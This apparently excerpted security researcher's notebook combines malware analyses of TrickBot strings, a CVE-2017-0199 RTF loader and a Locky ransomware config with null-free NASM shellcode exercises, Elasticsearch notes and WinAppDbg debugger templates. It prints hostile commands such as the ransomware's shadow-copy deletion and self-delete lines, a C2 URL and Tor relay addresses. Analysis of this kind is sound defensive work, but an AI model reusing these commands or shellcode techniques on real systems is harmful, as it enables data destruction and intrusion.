9PfvD2wumyseb6WjDqxhzavw3hAWDyHj4IW14Rxhss8IitL63qZOrqYTQVHc3l4WbCH5D6vf3qL1zh3KGI/kDCzf3y0xml+FiefRQ60WD2oRiy/5QEdjb6fymr7qD6xjm6W14IfEbeZezP+xiR+ei6/5mrfxQVHc3qvK9odW46WRmld0mIWjDUW14yZOrqY24VdRM2f19qL1zrvY9rf24VdRM2f19unZ8IsRQEd5bl85D6vOtVzuTEWRmIsX3lm0mIHn4V3Zix8Wb6HeMVAxM2f19unZssdd9qwjssdd9unZi/dW46WRmld0mIWjDUW14yZOrqYTbyWC46sebRvK T/WtsLsH dVzub/80bCB 4EdjmVApmIoC TUst mVHWbu Q6f14yWCiyHjDyQ iC8Xb+ mI/w bEAc dVzudVz TxWNau Dyfx3IY5bE8W4+ DIWRmIsU 8L7tBUw Q6Y5427x3IWR3I7jmrAh4205DyButUoT Q6Y5427x3IWR3IdWMIW14rANBsB 4yo5DIsU'
key = '+ArPLoIl3dKizHN9B8atTs2VQ4MDbmGpu0hqUWyCn5gckX1jwYeRx/6Ev7FSZfOJ'
std_b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

for s in data.split(' '):
 s = s.translate(str.maketrans(key,std_b64))
 if len(s)%4 != 0:
    s += '='*(4 - len(s)%4)
 print(base64.b64decode(s))

The output is as follows:

b'UnloadUserProfile'
b'LoadUserProfileW'
b'DestroyEnvironmentBlock'
b'CreateEnvironmentBlock'
b'USERENV.dll'
b'GetAdaptersInfo'
b'IPHLPAPI.dll'
b'NtQueryInformationProcess'
b'ntdll.dll'
b'PathFindExtensionW'
b'PathRemoveFileSpecW'
b'PathRemoveBackslashW'
b'StrStrIW'
b'PathRenameExtensionW'
b'PathAddBackslashW'
b'PathFindFileNameW'
b'SHLWAPI.dll'
b'CryptBinaryToStringW'
b'CryptStringToBinaryW'
b'CRYPT32.dll'
b'CoUninitialize'
b'CoCreateInstance'
b'ole32.dll'
b'SetSecurityDescriptorDacl'
b'InitializeSecurityDescriptor'
b'CopySid'
b'GetLengthSid'
b'SetEntriesInAclW'
b'GetSecurityInfo'
b'SetSecurityInfo'
b'SetNamedSecurityInfoW'
b'RegSetValueExW'
b'RegOpenKeyExW'
b'RegCloseKey'
b'RegCreateKeyExW'
b'RevertToSelf'
b'AdjustTokenPrivileges'
b'LookupPrivilegeValueW'
b'CryptGetHashParam'
b'CryptAcquireContextW'
b'CryptSetKeyParam'
b'CryptReleaseContext'
b'ConvertStringSecurityDescriptorToSecurityDescriptorW'
b'CryptImportKey'
b'CryptCreateHash'
b'CryptDecrypt'
b'CryptDestroyHash'
b'CryptHashData'
b'CryptDestroyKey'
b'AllocateAndInitializeSid'
b'FreeSid'
b'OpenProcessToken'
b'EqualSid'
b'CreateProcessAsUserW'
b'DuplicateTokenEx'
b'LookupAccountSidW'
b'GetTokenInformation'
b'GetUserNameW'
b'ADVAPI32.dll'
b'CreateToolhelp32Snapshot'
b'Process32NextW'
b'Process32FirstW'
b'MultiByteToWideChar'
b'WideCharToMultiByte'
b'GetModuleHandleA'
b'QueryPerformanceCounter'
b'GetCurrentThreadId'
b'SetUnhandledExceptionFilter'
b'UnhandledExceptionFilter'
b'lstrlenA'
b'GetCurrentProcessId'
b'GetSystemTimeAsFileTime'
b'GetCurrentProcess'
b'GetVersionExW'
b'GetVersion'
b'SetFilePointer'
b'WriteFile'
b'ReadFile'
b'CreateFileW'
b'lstrcmpiW'
b'GetTempFileNameW'
b'CreateProcessW'
b'MoveFileExW'
b'GetTickCount'
b'InitializeCriticalSectionAndSpinCount'
b'Sleep'
b'GetFileAttributesW'
b'GetModuleFileNameW'
b'GetStartupInfoW'
b'GetTempPathW'
b'MoveFileW'
b'SetCurrentDirectoryW'
b'DeleteFileW'
b'lstrcpyW'
b'LocalFree'
b'CreateMutexW'
b'ResumeThread'
b'WriteProcessMemory'
b'DuplicateHandle'
b'CreateEventW'
b'GetExitCodeThread'
b'VirtualAllocEx'
b'VirtualProtectEx'
b'TerminateProcess'
b'ReadProcessMemory'
b'VirtualFreeEx'
b'OpenProcess'
b'CreateRemoteThread'
b'SetEvent'
b'CreateDirectoryW'
b'SetFileAttributesW'
b'lstrcmpA'
b'LoadLibraryA'
b'GetFileTime'
b'FindNextFileW'
b'GetSystemInfo'
b'LockResource'
b'FindClose'
b'GetLastError'
b'lstrcpynW'
b'SetFileTime'
b'GetModuleHandleW'
b'LoadResource'
b'FreeLibrary'
b'FindResourceW'
b'FindFirstFileW'
b'GetFullPathNameW'
b'lstrlenW'
b'lstrcmpW'
b'GetComputerNameW'
b'CreateThread'
b'/?format=text'
b'www.myexternalip.com'
b'ident.me'
b'api.ip.sb'
b'\\iocopy'
b'WantRelease'
b'fifty'
b'cmd.exe'
b'185.41.154.130:9001'
b'37.252.190.176:443'
b'82.118.17.235:443'
b'83.163.164.15:9003'
b'69.163.34.173:443'
b'159.89.151.231:9001'
b'212.47.246.229:9003'
b'84.40.112.70:9001'
b'2.137.16.245:9001'
b'199.249.223.62:443'
b'185.22.172.237:443'
b'88.99.216.194:9001'
b'185.13.39.197:443'
b'162.247.72.201:443'
b'174.127.217.73:55554'
b'Content-Length: '
b'\r\n\r\n'
b'%s %S HTTP/1.1\r\nHost: %s%s%S'
b'.onion'
b'info.dat'
b'README.md'
b'FAQ'
b'DEBG'
b'MACHINE\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths'
b'MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths'
b'MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths'
b'WinDefend'
b'Global\\%08lX%04lX%lu'
b' working'
b'path'
b'ver.txt'
b'ModuleQuery'
b'LeaveCriticalSection'
b'EnterCriticalSection'
b'InitializeCriticalSection'
b'VERS'
b'SignatureLength'
b'ECCPUBLICBLOB'
b'ECDSA_P384'
b'spam.dnsbl.sorbs.net'
b'dnsbl-1.uceprotect.net'
b'b.barracudacentral.org'
b'cbl.abuseat.org'
b'zen.spamhaus.org'
b'GetNativeSystemInfo'
b'Module is not valid'
b'client_id'
b'1041'
b'/plain/clientip'
b'/text'
b'/raw'
b'/ip'
b'/plain'
b'ip.anysrc.net'
b'wtfismyip.com'
b'myexternalip.com'
b'icanhazip.com'
b'api.ipify.org'
b'ipinfo.io'
b'ipecho.net'
b'checkip.amazonaws.com'
b'ssert'
b'D:(A;;GA;;;WD)(A;;GA;;;BA)(A;;GA;;;SY)(A;;GA;;;RC)'
b'Global\\Muta'
b'--%s--\r\n\r\n'
b'--%s\r\nContent-Disposition: form-data; name="%S"\r\n\r\n'
b'Content-Type: multipart/form-data; boundary=%s\r\nContent-Length: %d\r\n\r\n'
b'------Boundary%08X'
b'winsta0\\default'
b'WTSQueryUserToken'
b'WTSGetActiveConsoleSessionId'
b'WTSFreeMemory'
b'WTSEnumerateSessionsA'
b'wtsapi32'
b'GetProcAddress'
b'LoadLibraryW'
b'ExitProcess'
b'ResetEvent'
b'CloseHandle'
b'WaitForSingleObject'
b'SignalObjectAndWait'
b'svchost.exe'
b'Release'
b'FreeBuffer'
b'Control'
b'Start'
b'Load to M failed'
b'Run D failed'
b'Load to P failed'
b'Find P failed'
b'Create ZP failed'
b'Module has already been loaded'
b'parentfiles'
b'ip'
b'id'
b'period'
b'file'
b'conf'
b'arg'
b'control'
b'needinfo'
b'autocontrol'
b'autoconf'
b'processname'
b'sys'
b'yes'
b'autostart'
b'*'
b'%s%s'
b'%s%s_configs\\'
b'Modules\\'
b'HeapReAlloc'
b'HeapFree'
b'GetProcessHeap'
b'HeapAlloc'
b'kernel32.dll'
b'0.0.0.0'
b'POST'
b'GET'
b'UrlEscapeW'
b'shlwapi'
b'BCryptDestroyKey'
b'BCryptCloseAlgorithmProvider'
b'BCryptVerifySignature'
b'BCryptGetProperty'
b'BCryptImportKeyPair'
b'BCryptOpenAlgorithmProvider'
b'NCryptFreeObject'
b'NCryptDeleteKey'
b'NCryptImportKey'
b'NCryptOpenStorageProvider'
b'Bcrypt.dll'
b'Ncrypt.dll'
b'%s %s SP%d'
b'x86'
b'x64'
b'Unknown'
b'Windows 2000'
b'Windows XP'
b'Windows Server 2003'
b'Windows Vista'
b'Windows Server 2008'
b'Windows 7'
b'Windows Server 2008 R2'
b'Windows 8'
b'Windows Server 2012'
b'Windows 8.1'
b'Windows Server 2012 R2'
b'Windows 10'
b'Windows 10 Server'
b'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'
b'psrv'
b'plugins'
b'expir'
b'servconf'
b'%d%d%d.'
b'Module already unloaded'
b'Control failed'
b'Module was unloaded'
b'Process has been finished'
b'release'
b'Start failed'
b'Process was unloaded'
b'GetParentInfo error'
b'Unable to load module from server'
b'start'
b'Decode from BASE64 error'
b'Win32 error'
b'Invalid params count'
b'No params'
b'info'
b'data'
b'%s/%s/64/%s/%s/%s/'
b'noname'
b'%s/%s/63/%s/%s/%s/%s/'
b'/%s/%s/25/%s/'
b'/%s/%s/23/%d/'
b'/%s/%s/14/%s/%s/0/'
b'/%s/%s/10/%s/%s/%d/'
b'/%s/%s/5/%s/'
b'/%s/%s/1/%s/'
b'/%s/%s/0/%s/%s/%s/%s/%s/'
b'srv'
b'ctl'
b'name'
b'module'
b'MsSystemWatcher'
b'%s.%s.%s.%s'
b'%s.%s'
b'%Y-%m-%dT%H:%M:%S'
b''
b''
b'InteractiveToken\nLeastPrivilege'
b'HighestAvailable\nNT AUTHORITY\\SYSTEM\nInteractiveToken\n'
b'\n'
b'\ntrue\n'
b'\n\n\n\n'
b'\n\n\nIgnoreNew\nfalse\nfalse\nfalse\ntrue\nfalse\n\ntrue\nfalse\n\ntrue\ntrue\ntrue\nfalse\nfalse\nPT0S\n7\n\n\n\n'
b'\ntrue\n\n1\n\n\n\n\n\n'
b'\n\nPT10M\nP1D\nfalse\n\n'
b'\n<Task version="1.2"\nxmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">\n\n1.0.1\nMs System watcher\n\n\n\n'
b'SYSTEM'
b'%s sTart'
b'group_tag'
b'RES'
b'user'
b'config.conf'
b'.tmp'
b'tmp'
b'spk'
b'%s %s'
b'SINJ'
b'not listed'
b'listed'
b'DNSBL'
b'client is not behind NAT'
b'client is behind NAT'
b'failed'

Analysis of Latest TrickBot Core Possible Build ‘1041’
A. Hardcoded Tor Relay List

b'185.41.154.130:9001'
b'37.252.190.176:443'
b'82.118.17.235:443'
b'83.163.164.15:9003'
b'69.163.34.173:443'
b'159.89.151.231:9001'
b'212.47.246.229:9003'
b'84.40.112.70:9001'
b'2.137.16.245:9001'
b'199.249.223.62:443'
b'185.22.172.237:443'
b'88.99.216.194:9001'
b'185.13.39.197:443'
b'162.247.72.201:443'
b'174.127.217.73:55554'

B. External IP Resolution

b'www.myexternalip.com'
b'ident.me'
b'api.ip.sb'
b'ip.anysrc.net'
b'wtfismyip.com'
b'myexternalip.com'
b'icanhazip.com'
b'api.ipify.org'
b'ipinfo.io'
b'ipecho.net'
b'checkip.amazonaws.com'

C. Task Scheduler XML Struct

b''
b''
b'InteractiveToken\nLeastPrivilege'
b'HighestAvailable\nNT AUTHORITY\\SYSTEM\nInteractiveToken\n'
b'\n'
b'\ntrue\n'
b'\n\n\n\n'
b'\n\n\nIgnoreNew\nfalse\nfalse\nfalse\ntrue\nfalse\n\ntrue\nfalse\n\ntrue\ntrue\ntrue\nfalse\nfalse\nPT0S\n7\n\n\n\n'
b'\ntrue\n\n1\n\n\n\n\n\n'
b'\n\nPT10M\nP1D\nfalse\n\n'
b'\n<Task version="1.2"\nxmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">\n\n1.0.1\nMs System watcher\n\n\n\n'

D. Bot IP Check for Spam Blocklist

b'spam.dnsbl.sorbs.net'
b'dnsbl-1.uceprotect.net'
b'b.barracudacentral.org'
b'cbl.abuseat.org'
b'zen.spamhaus.org'

Let’s Learn: Preparing Shellcode in NASM

Goal: Create a neat shellcode without padded “00” in NASM for exploit bundling
Source: OpenSecurityTraining “Software Exploits”
Attempt I:

; ;;;;;;;;;;;;;;;;;;;;;;;;

basic ‘Hello World’ in nasm

; compile with nasm -f elf hello.asm; ld -o hello hello.o

; ;;;;;;;;;;;;;;;;;;;;;;;;

section .data

; ;;;;;;;;;;;;;;;;;;;;;;;;

msg db ‘Hello World’, 0xa

; ;;;;;;;;;;;;;;;;;;;;;;;;

section .text

; ;;;;;;;;;;;;;;;;;;;;;;;;

global _start

; ;;;;;;;;;;;;;;;;;;;;;;;;

start:

; ;;;;;;;;;;;;;;;;;;;;;;;;

; write(int fd, char *msg, unsigned int len)

; ;;;;;;;;;;;;;;;;;;;;;;;;

mov eax, 4

mov ebx, 1

mov ecx, msg

mov edx, 8

int 0x80

; ;;;;;;;;;;;;;;;;;;;;;;;;

; exit(int ret)

; ;;;;;;;;;;;;;;;;;;;;;;;;

mov eax, 1

mov ebx, 0

int 0x80

Attempt II (change extended to lower byte register values):

; ;;;;;;;;;;;;;;;;;;;;;;;;

section .data

; ;;;;;;;;;;;;;;;;;;;;;;;;

msg db ‘Hello World’, 0xa

; ;;;;;;;;;;;;;;;;;;;;;;;;

section .text

; ;;;;;;;;;;;;;;;;;;;;;;;;

global _start

; ;;;;;;;;;;;;;;;;;;;;;;;;

start:

; ;;;;;;;;;;;;;;;;;;;;;;;;

mov al, 4

mov bl, 1

mov ecx, msg

mov dl, 8

int 0x80

; ;;;;;;;;;;;;;;;;;;;;;;;;

mov al, 1

mov bl, 0

int 0x80

Attempt III (achieve code independence):

; ;;;;;;;;;;;;;;;;;;;;;;;;

section .text

; ;;;;;;;;;;;;;;;;;;;;;;;;

global _start

; ;;;;;;;;;;;;;;;;;;;;;;;;

_start:

; ;;;;;;;;;;;;;;;;;;;;;;;;

; clear out the registers we need

xor eax, eax

xor ebx, ebx

xor ecx, ecx

xor edx, edx

; write(int fd, char *msg, unsigned int len)

mov al, 4

mov bl, 1

; Owned!! = 4f,77,6e,65,64,21,21,0xa

; push \n,!,!,d

push 0x0a212164

; push e,n,w,O

push 0x656e774f

mov dl, 8

int 0x80

; ;;;;;;;;;;;;;;;;;;;;;;;;

mov al, 1

mov bl, 0

int 0x80

Attempt IV (remove 0xa newline):

; ;;;;;;;;;;;;;;;;;;;;;;;;

section .text

; ;;;;;;;;;;;;;;;;;;;;;;;;

global _start

; ;;;;;;;;;;;;;;;;;;;;;;;;

_start:

; ;;;;;;;;;;;;;;;;;;;;;;;;

; clear out the registers we need

xor eax, eax

xor ebx, ebx

xor ecx, ecx

xor edx, edx

; write(int fd, char *msg, unsigned int len)

mov al, 4

mov bl, 1

; Owned!! = 4f,77,6e,65,64,21,21,0xa

; push \n,!,!,d

push 0x21212164

; push e,n,w,O

push 0x656e774f

mov dl, 8

int 0x80

; ;;;;;;;;;;;;;;;;;;;;;;;;

mov al, 1

mov bl, 0

int 0x80

Elasticsearch

Elasticsearch Concept
Goal: Document and annotate some quick notes on learning elasticsearch.

I. CREATING YOUR OWN ANALYZER: SET UP ANALYZER SETTINGS

curl -X PUT "http://localhost:9200/wiki" -d '{
 "index" : {
  "number_of_shards" : 4,
  "number_of_replicas" : 1,
  "analysis" : {
   "analyzer" : {
    "content" : {
     "type" : "custom",
     "tokenizer" : "standard",
     "filter" : ["lowercase", "stop", "kstem"],
     "char_filter" : ["html_strip"]
    }
   }
  }
 }

}'

II. PUT (CREATE) MAPPING": CREATE MAPPING (STRING -> TEXT) for INDEX


curl -X PUT "http://localhost:9200/wiki/articles/_mapping" -d '{
    "articles" : {
  "_all" : { "enabled" : true } ,
  "properties" : {
   "Title" : { "type" : "text" , "analyzer" : "content" , "include_in_all" : false, "index" : "no" },
   "link" : { "type" : "text" , "include_in_all" : false, "index" : "no" },
   "Author" : { "type" : "text" , "include_in_all" : false },
   "timestamp" : { "type" : "date" , "format" : "dd-MM-yyyy HH:mm:ss", "include_in_all" : false }, 
   "html" : { "type" : "text" , "analyzer" : "content", "include_in_all" : true }
  }
    }
  }'

A. GENERATE JSON OBJECT FOR ELASTICSEARCH


python json_generator.py https://en.wikipedia.org/wiki/France > France.json
'''

# Python module script
/*import urllib2
import json
import sys

link = sys.argv[2]
htmlObj = { "link" : link,
   "Author" : "anomymous",
   "timestamp" : "12-12-2018 14:16:00",
   "Title" : sys.argv[1]
   }
response = urllib2.urlopen(link)
htmlObj['html'] = response.read()
print json.dumps(htmlObj, indent=4)
*/
'''

III. XPOST (PUSH) JSON FILE TO ELASTICSEARCH WIKI ARTICLES

 curl -XPOST "http://localhost:9200/wiki/articles/" -d @France.json

IV. USING PHRASE QUERY TO SEARCH: SEARCH ELASTICSEARCH INDEX FOR CONTENT

curl -X POST "http://localhost:9200/wiki/_search?pretty" -d '{
 "_source" : [
    "Title"
  ],
  "query" : {
    "query_string": {
      "query" : "mobile"
   }
  }
}'

V. USING THE HIGHLIGHTING FEATURE: SEARCH ELASTICSEARCH INDEX FOR CONTENT (HIGHLIGHTED)

# Query highlighted content
curl -X POST "http://localhost:9200/wiki/_search?pretty" -d '{
 "_source" : [
    "Title"
  ],
  "query" : {
    "query_string": {
      "query" : "mobile"
   }
  }
  "highlight" : {
  "pre_tags" : [""],
  "post_tags" : [""],
  "fields" : {
  "Content" : {}
  }
  }
}
}'


VI. PAGINATION


curl -X POST "http://localhost:9200/wiki/_search?pretty" -d '{
 "from" : 0,
 "size" : 10,
 "query" : {
  "simple_query_string" : {
   "query" : "mobile",
   "fields" : [
   "_all"
   ]
   }
  },
  "highlight" : {
   "fields" : {
     "html" : {
      "pre_tags" : [
       ""
      ],
      "post_tags" : [
       "
"
      ],
      "fragment_size" : 10,
      "number_of_fragments" :3
     }
   }
  }
}'

CHAPTER 2: BUILDING YOUR OWN E-COMMERCE SOLUTION

type
String
Integer
Long
Float
Double
Boolean
Date
geo_point
Null
Ipv4

I. CREATE (PUT) INDEX "products"


curl -X PUT "http://localhost:9200/products" -d '{
 "index" : {
  "number_of_shards" : 1,
  "number_of_replicas" : 1
 }
}'

II. CREATING MAPPING: Put "product" as the type for "products" index

curl -X PUT "http://localhost:9200/products/product/_mapping" -d '{
    "product" : {
  "properties" : {
   "name" : {
    "type" : "text" 
   },
   "description" : {
    "type" : "text"
   },
   "dateOfManufactering" : {
    "type" : "date",
    "format" : "YYYY-MM-dd"
   },
   "price" : {
    "type" : "long"
   },
   "productType" : {
    "type" : "text",
    "include_in_all" : "false",
    "index" : "not_analyzed"
   },
   "totalBuy" : {
    "type" : "long",
    "include_in_all": "false",
   },
   "imageURL" : {
    "type" : "text",
    "include_in_all": "false",
    "index" : "no"    
   },   
  }
    }
  }'

Let’s Learn (DIY): Sophisticated Cobalt Strike Gang’s CVE-2017-0199 Loader

Goal: Reverse the first stage loader RTF CVE-2017-0199 loader used by Cobalt Strike gang targeting Russian-speaking financial institutions. This loader’s been seen in conjunction with the Microsoft Word Intruder 8.0.
Source: @xdxdxdxdoa
Tool: rtfdump 0.5, ILspy
CVE-2017-0199: Exploit that allows “remote attackers to execute arbitrary code via a crafted document, aka “Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API” [source].
Observed unique filename:

Пеня по задолженности.doc -> “Debt collection notification.doc” (from Russian to English)
Заявление на расторжение договора.doc -> “Application for contract closure.doc” (from Russian to English)

MD5: f8b6c00eedfefe64884eb0139245ef85

SHA-256: c5d7c5c94468ba74211e08d7c2ad9d0274011d432edc1af8cdf2215b2c9d9291

Type:

Rich Text Format (CVE-2017-0199 exploit)
Objects OLE embedded (Package)
OLE Autolink (Package)

Here are the steps:

I. Command: python2.7 rtfdump.py file.rtf

II. Command: python2.7 rtfdump.py -f O file.rtf

OLE 1.0 objects embedded within this RTF file with the “-f O” command

III. Command: python2.7 rtfdump.py -s 8 file.rtf | more (on the 8 field found in the previous step)

The section 01050000 02000000 indicates an OLE 1.0 object. As the line starts with 9f330500 contains an OLE file.

With option -H, we can convert the hexadecimal characters to binary:

IV. Command: python2.7 rtfdump.py -s 8 -H file.rtf

With option -i, we can obtain more information about the binary (embedded object):

V. Command: python2.7 rtfdump.py -s 8 -H -i file.rtf

Name: ‘Package\x00’ Position embedded: 00000020 Size embedded: 0005339f md5: a9039264caf3285bf968849bf84ad951 magic: 02007e57

With option -E, we can extract the embedded object:

VI. Command: python2.7 rtfdump.py -s 8 -H -E -d file.rtf > binary.exe

The payload is written in Microsoft Visual C# / Basic .NET titled “ExecPS.” Using ILspy, we decompile the embedded binary. The embedded binary has a PDF icon and an internal name as “ExecPS[.]exe.”

Checks for Dr. Web anti-virus process and breaks if they exist.

ProcessName = “dwengine” || “spidergate” || “spidernt” | “spideragent”

Moreover, the embedded binary is digitally signed by “Elektro, OOO” from Nizhni Novgorod, Russia.

CN = Elektro, OOO
O = Elektro, OOO
STREET = d. 13 kv. 11, prospekt Soyuzny
L = Nizhni Novgorod
S = Nizhegorodskaya oblast
PostalCode = 603040
C = RU

p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px ‘Andale Mono’; color: #28fe14; background-color: #000000; background-color: rgba(0, 0, 0, 0.9)} span.s1 {font-variant-ligatures: no-common-ligatures} p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px ‘Andale Mono’; color: #28fe14; background-color: #000000; background-color: rgba(0, 0, 0, 0.9)} span.s1 {font-variant-ligatures: no-common-ligatures} p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px ‘Andale Mono’; color: #28fe14; background-color: #000000; background-color: rgba(0, 0, 0, 0.9)} span.s1 {font-variant-ligatures: no-common-ligatures}

p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 8.5px Helvetica}

06-21-2017 Locky Ransomware: Config Analysis

Source: https://www.virustotal.com/en/file/b546fad0209bbf800c11565c4720fdb2685966242d2ff162f7be556dd037a6a1/analysis/
Config: https://github.com/vkremez/MalwareConfigurations/blob/master/crime_win32_locky_conf_June21-2017.txt

Locky extension:

.loptr

POST requests:

&length=..&failed=..&encrypted=

&act=stats&path=

&v=2..&x64=..&sp=..&os=…&serv=..&corp=..&lang=..&act=getkey&affid=..

&act=gethtml&lang=..&act=gettext&lang=..

Registry:

Software\Microsoft\Windows\CurrentVersion\Run

Self-kill routine:

cmd.exe /C del /Q /F

Blacklist:

tmp;winnt;Application Data;AppData;Program Files (x86);Program Files;temp;thumbs.db;$Recycle.Bin;System Volume Information;Boot;Windows

Locky instructions:

/_HELP_instructions.html._HELP_instructions.bmp.._HELP_instructions.txt.._Locky_recover_instructions.bmp._Locky_recover_instructions.txt

Delete shadow copy:

vssadmin.exe Delete Shadows /Quiet /All

C2:

hxxp://185[.]115[.]140[.]170/checkupdate

Targeted extensions:

..yuv…ycbcra..xis…x3f…x11…wpd…tex…sxg…stx…st8…st5…srw…srf…sr2…sqlitedb..sqlite3…sqlite..sdf…sda…sd0…s3db..rwz…rwl…rdb…rat…raf…qby…qbx…qbw…qbr…qba…py..psafe3..plc…plus_muhd…pdd…p7c…p7b…oth…orf…odm…odf…nyf…nxl…nx2…nwb…ns4…ns3…ns2…nrw…nop…nk2…nef…ndd…myd…mrw…moneywell…mny…mmw…mfw…mef…mdc…lua…kpdx..kdc…kdbx..kc2…jpe…incpas..iiq…ibz…ibank…hbk…gry…grey..gray..fhd…fh..ffd…exf…erf…erbsql..eml…dxg…drf…dng…dgc…des…der…ddrw..ddoc..dcs…dc2…db_journal..csl…csh…crw…craw..cib…ce2…ce1…cdrw..cdr6..cdr5..cdr4..cdr3..bpw…bgt…bdb…bay…bank..backupdb..backup..back..awg…apj…ait…agdl..ads…adb…acr…ach…accdt…accdr…accde…ab4…3pr…3fr…vmxf..vmsd..vhdx..vhd…vbox..stm…st7…rvt…qcow..qed…pif…pdb…pab…ost…ogg…nvram…ndf…m4p…m2ts..log…hpp…hdd…groups..flvv..edb…dit…dat…cmt…bin…aiff..xlk…wad…tlg…st6…st4…say…sas7bdat..qbm…qbb…ptx…pfx…pef…pat…oil…odc…nsh…nsg…nsf…nsd…nd..mos…indd..iif…fpx…fff…fdb…dtd…design..ddd…dcr…dac…cr2…cdx…cdf…blend…bkp…al..adp…act…xlr…xlam..xla…wps…tga…rw2…r3d…pspimage..ps..pct…pcd…m4v…m…fxg…flac..eps…dxb…drw…dot…db3…cpi…cls…cdr…arw…ai..aac…thm…srt…save..safe..rm..pwm…pages…obj…mlb…md..mbx…lit…laccdb..kwm…idx…html..flf…dxf…dwg…dds…csv…css…config..cfg…cer…asx…aspx..aoi…accdb…7zip..1cd…xls…wab…rtf…prf…ppt…oab…msg…mapimail..jnt…doc…dbx…contact…n64…m4a…m4u…m3u…mid…wma…flv…3g2…mkv…3gp…mp4…mov…avi…asf…mpeg..vob…mpg…wmv…fla…swf…wav…mp3…qcow2…vdi…vmdk..vmx…wallet..upk…sav…re4…ltx…litesql…litemod…lbf…iwi…forge…das…d3dbsp..bsa…bik…asset…apk…gpg…aes…ARC…PAQ…tar.bz2…tbk…bak…tar…tgz…gz..7z..rar…zip…djv…djvu..svg…bmp…png…gif…raw…cgm…jpeg..jpg…tif…tiff..NEF…psd…cmd…bat…sh..class…jar…java..rb..asp…cs..brd…sch…dch…dip…pl..vbs…vb..js..h…asm…pas…cpp…c…php…ldf…mdf…ibd…MYI…MYD…frm…odb…dbf…db..mdb…sql…SQLITEDB..SQLITE3…011…010…009…008…007…006…005…004…003…002…001…pst…onetoc2…asc…lay6..lay…ms11(Securitycopy)..ms11..sldm..sldx..ppsm..ppsx..ppam..docb..mml…sxm…otg…odg…uop…potx..pom..pptx..pptm..std…sxd…pot…pps…sti…sxi…otp…odp…wb2…123…wks…wk1…xltx..xltm..xlsx..xlsm..xlsb..slk…xlw…xlt…xlm…xlc…dif…stc…sxc…ots…ods…hwp…602…dotm..dotx..docm..docx..DOT…3dm…max…3ds…xml…txt…CSV…uot…RTF…pdf…XLS…PPT…stw…sxw…ott…odt…DOC…pem…p12…csr…crt…key..wallet.dat..

p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica} p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; min-height: 14.0px}

Python WinAppDbg Template Constructs

Source: https://gitlab.com/vitali.kremez/winappdbg_contruct
Credit: WinappDbg; Parsia
###########################
#### WinAppDbg ###########
##########################

I. GetRunnerProcess

    if (args.run):
        # Concat all arguments into a string
        myargs = " ".join(args.run)

        if win32.PathFileExists(args.run[0]) is True:
            # File exists
            # Create a Debug object
            debug = winappdbg.Debug()

            try:
                # Debug the app
                # First item is program and the rest are arguments
                # execl: https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/debug.py#L358
                my_process = debug.execl(myargs)

                print("Attached to {0} - {1}".format(my_process.get_pid(),
                                               my_process.get_filename()))

                # Keep debugging until the debugger stops
                debug.loop()

            finally:
                # Stop the debugger
                debug.stop()
                print("[*] Debugger stopped.")

        else:
            print("{0} not found.".format(args.run[0]))
        exit()

II. GetSystemInformation()

    if(args.sysinfo):
        # Create a System object
        # https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/system.py#L66
        system = winappdbg.System()

        # Use the built-in WinAppDbg table
        # https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/textio.py#L1094
        table = winappdbg.Table("\t")

        # New line
        table.addRow("", "")

        # Header
        title = ("System Information", "")
        table.addRow(*title)

        # Add system information
        table.addRow("------------------")
        table.addRow("Bits", system.bits)
        table.addRow("OS", system.os)
        table.addRow("Architecture", system.arch)
        table.addRow("32-bit Emulation", system.wow64)
        table.addRow("Admin", system.is_admin())
        table.addRow("WinAppDbg", winappdbg.version)
        table.addRow("Process Count", system.get_process_count())

        print table.getOutput()
        exit()


III. GetProcessList
    if (args.getprocesses):

        system = winappdbg.System()

        # We can reuse example 02 from the docs
        # https://winappdbg.readthedocs.io/en/latest/Instrumentation.html#example-2-enumerating-running-processes
        table = winappdbg.Table("\t")
        table.addRow("", "")

        header = ("pid", "process")
        table.addRow(*header)

        table.addRow("----", "----------")

        processes = {}

        # Add all processes to a dictionary then sort them by pid
        for process in system:
            processes[process.get_pid()] = process.get_filename()

        # Iterate through processes sorted by pid
        for key in sorted(processes.iterkeys()):
            table.addRow(key, processes[key])

        print table.getOutput()
        exit()


IV.AttachByProcessID
    if (args.pid):
        system = winappdbg.System()

        # Get all pids
        pids = system.get_process_ids()

        if args.pid in pids:
            # pid exists

            # Create a Debug object
            debug = winappdbg.Debug()

            try:
                # Attach to pid
                # attach: https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/debug.py#L219
                my_process = debug.attach(args.pid)

                print "Attached to %d - %s" % (my_process.get_pid(),
                                               my_process.get_filename())

                # Keep debugging until the debugger stops
                debug.loop()

            finally:
                # Stop the debugger
                debug.stop()
                print "Debugger stopped."

        else:
            print "pid %d not found." % (args.pid)

        exit()


V. AttachByProcessName
    if (args.pname):
        debug = winappdbg.Debug()

        # example 3:
        # https://winappdbg.readthedocs.io/en/latest/_downloads/03_find_and_attach.py

        try:
            debug.system.scan()
            for (process, name) in debug.system.find_processes_by_filename(args.pname):
                print "Found %d, %s" % (process.get_pid(),
                                        process.get_filename())

                debug.attach(process.get_pid())

                print "Attached to %d-%s" % (process.get_pid(),
                                             process.get_filename())

            debug.loop()

        finally:
            # Stop the debugger
            debug.stop()
            print "Debugger stopped."
        exit()


VI. WriteLoggerOutput
    global logger
    if args.output:
        # verbose=False disables printing to stdout
        logger = winappdbg.Logger(args.output, verbose=False)
    else:
        logger = winappdbg.Logger()


# Example
